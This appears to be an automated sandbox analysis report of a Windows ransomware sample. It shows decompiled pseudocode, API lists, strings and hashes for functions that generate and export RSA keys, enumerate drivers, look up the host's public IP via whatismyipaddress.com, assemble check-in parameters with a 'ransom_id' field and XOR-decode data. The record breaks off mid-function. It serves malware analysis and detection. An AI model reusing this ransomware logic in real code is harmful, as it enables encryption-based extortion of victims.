Instruction Fuzzy Hash: 1A31E475A40208AFDB10CFE5DC49BEEBBB8EF84712F104069F601E2181D779AA148B64

Uniqueness

Uniqueness Score: -1.00%

Function 0F1463E0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0F1463E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f1463f4
0x0f1463f8
0x0f146400
0x0f146438
0x0f146446
0x0f14644a
0x0f146452
0x0f146452
0x0f146455
0x0f14646e
0x0f146486
0x0f146490
0x0f14649c
0x0f1464b1
0x00000000
0x0f1464b7
0x0f146402
0x0f14640d
0x00000000
0x0f146431
0x0f14641e
0x0f146426
0x00000000
0x0f14642f
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F144B96,?,0F144B9E), ref: 0F1463F8
GetLastError.KERNEL32(?,0F144B9E), ref: 0F146402
CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F144B9E), ref: 0F14641E
CryptGenKey.ADVAPI32(0F144B9E,0000A400,08000001,?,?,0F144B9E), ref: 0F14644A
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F14646E
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F146486
CryptDestroyKey.ADVAPI32(?), ref: 0F146490
CryptReleaseContext.ADVAPI32(0F144B9E,00000000), ref: 0F14649C
CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F1464B1

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F1463ED, 0F146413, 0F1464A6

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: 35157004f6a2ce43f14be03d322c0763115aedbe68c740ac715c88dca9a8d3e5
Instruction ID: 32f2803a12e5098c24370db216d6e2958018c884f58f457de0bab4b5b94fbf06
Opcode Fuzzy Hash: 35157004f6a2ce43f14be03d322c0763115aedbe68c740ac715c88dca9a8d3e5
Instruction Fuzzy Hash: FF214179780305BBEB20CFA0DD4AF9A7779AB88B15F504404F701AB1C0D7BAB5A49B60

Uniqueness

Uniqueness Score: -1.00%

Function 0F142F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0F142F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x0f142f5a
0x0f142f69
0x0f142f6d
0x0f142f74
0x0f142f76
0x0f142f7b
0x0f142f8d
0x0f142f93
0x0f142f97
0x0f142fa8
0x0f142fac
0x0f142ff2
0x0f142ffa
0x0f143008
0x0f142fae
0x0f142fb1
0x0f142fb3
0x0f142fb8
0x0f142fc0
0x0f142fc5
0x0f142fcf
0x0f142fd7
0x00000000
0x0f142fd9
0x0f142fe3
0x0f142feb
0x0f143011
0x0f143022
0x00000000
0x00000000
0x00000000
0x0f142feb
0x00000000
0x0f142fed
0x0f142fed
0x0f142fee
0x0f142fc0
0x00000000
0x0f142fb8
0x0f142f99
0x0f142f9e
0x0f142f9e
0x0f142f81
0x0f142f81
0x0f142f81
0x00000000

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F142F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F142F8D

Strings

i)w, xrefs: 0F142FE3

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: i)w
API String ID: 4140748134-1280834553
Opcode ID: 2fccd09ffb9a21c52927ac2692f26f22def1d12a6fc7d31e0b9e38cc4dd609bb
Instruction ID: f1b2403d6271fb5be028693a9ad1733308792222de558b8054ca6f59f5387cab
Opcode Fuzzy Hash: 2fccd09ffb9a21c52927ac2692f26f22def1d12a6fc7d31e0b9e38cc4dd609bb
Instruction Fuzzy Hash: 81212C36B44218BBEB108E98DC41FEDB7BCEF84711F4001A6FE04D6180DB74B9659B90

Uniqueness

Uniqueness Score: -1.00%

Function 0F146FF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0F147E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F148024
Part of subcall function 0F147E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F14803D

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,772966A0,?), ref: 0F14700F
lstrlenW.KERNEL32(0F14FF8C), ref: 0F14701C

Part of subcall function 0F148050: InternetCloseHandle.WININET(?), ref: 0F148063
Part of subcall function 0F148050: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F148082

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F14FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F14704B
wsprintfW.USER32 ref: 0F147063
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F14FF90,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F147079
InternetCloseHandle.WININET(?), ref: 0F147087

Strings

GET, xrefs: 0F147024
ipv4bot.whatismyipaddress.com, xrefs: 0F14703C

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: 48a8a72b010258eab4589126aed81f1e073fea08bcc61858990e584651263144
Instruction ID: 7597b9d3fd40e6b675767185d2d8d230c9b372c8d0d3bfbd35e0560b0c79234a
Opcode Fuzzy Hash: 48a8a72b010258eab4589126aed81f1e073fea08bcc61858990e584651263144
Instruction Fuzzy Hash: 250152397812007BD7206E659C4EF9B3A28AFC6B22F010024FA05E31C1DB69B57AC6A5

Uniqueness

Uniqueness Score: -1.00%

Function 0F147E40 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F147E40(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x0f147e58
0x0f147e64
0x0f147e6f
0x0f147e79
0x0f147e83
0x0f147e8d
0x0f147e97
0x0f147ea1
0x0f147eab
0x0f147eb5
0x0f147ebf
0x0f147ec9
0x0f147ed3
0x0f147edd
0x0f147ee7
0x0f147ef1
0x0f147efb
0x0f147f05
0x0f147f0f
0x0f147f19
0x0f147f23
0x0f147f2d
0x0f147f37
0x0f147f41
0x0f147f4b
0x0f147f52
0x0f147f59
0x0f147f60
0x0f147f67
0x0f147f6e
0x0f147f75
0x0f147f7c
0x0f147f83
0x0f147f8a
0x0f147f91
0x0f147f98
0x0f147f9f
0x0f147fa6
0x0f147fad
0x0f147fb4
0x0f147fbb
0x0f147fc2
0x0f147fc9
0x0f147fd0
0x0f147fd7
0x0f147fde
0x0f147fe5
0x0f147fec
0x0f147ff3
0x0f147ffa
0x0f148001
0x0f148008
0x0f14800f
0x0f148016
0x0f14801d
0x0f148024
0x0f148026
0x0f14802b
0x0f14803d
0x0f14803f
0x00000000
0x0f14803f
0x0f148048

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F148024
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F14803D

Strings

7, xrefs: 0F147F59
5, xrefs: 0F147FC9
3, xrefs: 0F14801D
e, xrefs: 0F147F37
, xrefs: 0F147FAD
i, xrefs: 0F147EAB
, xrefs: 0F147FF3
t, xrefs: 0F147F4B
K, xrefs: 0F147F41
i, xrefs: 0F148008
a, xrefs: 0F148001
e, xrefs: 0F147F2D
T, xrefs: 0F147F75
w, xrefs: 0F147EBF
6, xrefs: 0F147EDD
d, xrefs: 0F147EB5
5, xrefs: 0F147E8D
e, xrefs: 0F147FC2
3, xrefs: 0F147F60
5, xrefs: 0F14800F
5, xrefs: 0F147F52
6, xrefs: 0F147F05
8, xrefs: 0F147FDE
p, xrefs: 0F147F23
8, xrefs: 0F147FEC
., xrefs: 0F147FD0
a, xrefs: 0F147FFA
o, xrefs: 0F147FA6
e, xrefs: 0F147F91
T, xrefs: 0F147ED3
), xrefs: 0F147F0F
O, xrefs: 0F147EFB
K, xrefs: 0F147F6E
, xrefs: 0F147F67
0, xrefs: 0F147E97
7, xrefs: 0F148016
o, xrefs: 0F147FBB
3, xrefs: 0F147FE5
, xrefs: 0F147EC9
L, xrefs: 0F147F7C
, xrefs: 0F147F83
., xrefs: 0F147FD7
, xrefs: 0F147EF1
A, xrefs: 0F147F19
1, xrefs: 0F147EE7
G, xrefs: 0F147F98
a, xrefs: 0F147E83
h, xrefs: 0F147FB4
l, xrefs: 0F147E79
c, xrefs: 0F147F9F
i, xrefs: 0F147F8A
(, xrefs: 0F147EA1
M, xrefs: 0F147E64
z, xrefs: 0F147E6F

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: 33d3080af4ce2883dc5ed71013121399c7f91fdd643f2a4e664ca12b2b26e0c4
Instruction ID: 82c453c82b563c6a6d50288502b4e44da338af78819e7b833011b23e673d3d40
Opcode Fuzzy Hash: 33d3080af4ce2883dc5ed71013121399c7f91fdd643f2a4e664ca12b2b26e0c4
Instruction Fuzzy Hash: 2941A8B4811358DEEB25CF91999879EBFF5BB04748F50819ED5086B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0F1470A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F1470A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x0f1470a4
0x0f1470a7
0x0f1470b8
0x0f1470c1
0x0f1470c9
0x0f1470d2
0x0f1470da
0x0f1470da
0x0f1470df
0x0f1470e5
0x0f1470ed
0x0f1470f3
0x0f1470fb
0x0f1470fb
0x0f147101
0x0f147107
0x0f14710f
0x0f147115
0x0f14711d
0x0f14711d
0x0f147123
0x0f147129
0x0f147131
0x0f147137
0x0f14713f
0x0f14713f
0x0f147145
0x0f14714b
0x0f147153
0x0f147159
0x0f147161
0x0f147161
0x0f147167
0x0f14716d
0x0f147175
0x0f14717b
0x0f147183
0x0f147183
0x0f147189
0x0f14718f
0x0f147197
0x0f14719d
0x0f1471a5
0x0f1471a5
0x0f1471ab
0x0f1471b1
0x0f1471b9
0x0f1471bf
0x0f1471c7
0x0f1471c7
0x0f1471cd
0x0f1471d3
0x0f1471db
0x0f1471e1
0x0f1471e9
0x0f1471e9
0x0f1471ef
0x0f1471fc
0x0f147202
0x0f147205
0x0f14720a
0x0f147227
0x0f14720c
0x0f147216
0x0f14721c
0x0f147234
0x0f14723c
0x0f147242
0x0f14724a
0x0f147256
0x0f147256
0x0f147260
0x0f147266
0x0f14726e
0x0f147274
0x0f14727c
0x0f14727c
0x0f147288
0x0f147292

APIs

lstrcatW.KERNEL32(?,?), ref: 0F1470C1
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F1470C9
lstrcatW.KERNEL32(?,?), ref: 0F1470D2
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1470DA
lstrcatW.KERNEL32(?,?), ref: 0F1470E5
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F1470ED
lstrcatW.KERNEL32(?,?), ref: 0F1470F3
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1470FB
lstrcatW.KERNEL32(?,?), ref: 0F147107
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F14710F
lstrcatW.KERNEL32(?,?), ref: 0F147115
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F14711D
lstrcatW.KERNEL32(?,?), ref: 0F147129
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F147131
lstrcatW.KERNEL32(?,?), ref: 0F147137
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F14713F
lstrcatW.KERNEL32(?,?), ref: 0F14714B
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F147153
lstrcatW.KERNEL32(?,?), ref: 0F147159
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F147161
lstrcatW.KERNEL32(?,?), ref: 0F14716D
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F147175
lstrcatW.KERNEL32(?,?), ref: 0F14717B
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F147183
lstrcatW.KERNEL32(?,0F144B36), ref: 0F14718F
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F147197
lstrcatW.KERNEL32(?,?), ref: 0F14719D
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1471A5
lstrcatW.KERNEL32(?,?), ref: 0F1471B1
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F1471B9
lstrcatW.KERNEL32(?,?), ref: 0F1471BF
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1471C7
lstrcatW.KERNEL32(?,?), ref: 0F1471D3
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F1471DB
lstrcatW.KERNEL32(?,?), ref: 0F1471E1
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F1471E9
VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F144869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F1471FC
wsprintfW.USER32 ref: 0F147216
wsprintfW.USER32 ref: 0F147227
lstrcatW.KERNEL32(?,?), ref: 0F147234
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F14723C
lstrcatW.KERNEL32(?,?), ref: 0F147242
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F14724A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F147256
lstrcatW.KERNEL32(?,?), ref: 0F147266
lstrcatW.KERNEL32(?,0F14FFD0), ref: 0F14726E
lstrcatW.KERNEL32(?,?), ref: 0F147274
lstrcatW.KERNEL32(?,0F14FFD4), ref: 0F14727C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F144869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F14727F

Strings

%x%x, xrefs: 0F147210
undefined, xrefs: 0F147221

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 0d6397ff9298b508ed82d3c9208223eb1a35fd5c5ed31ddaeb9cd1824d48a7b9
Instruction ID: 4008c2ee750c8581f6892f46d279bec2ee2877dc9a9b3f428de80b73eddee320
Opcode Fuzzy Hash: 0d6397ff9298b508ed82d3c9208223eb1a35fd5c5ed31ddaeb9cd1824d48a7b9
Instruction Fuzzy Hash: 28512F32146654B7DB2B3F618C49FDF3A19EFC6700F020054F921151DA8B69A263DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0F1442B0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0F1442B0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xf152a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0F143BC0( &_v148);
				E0F147490( &_v236, __edx); // executed
				_t97 = E0F1472A0( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0F1470A0( &_v152, _t98); // executed
				_t60 = E0F1481F0(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xf150510]");
				_t77 = 0xf152000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
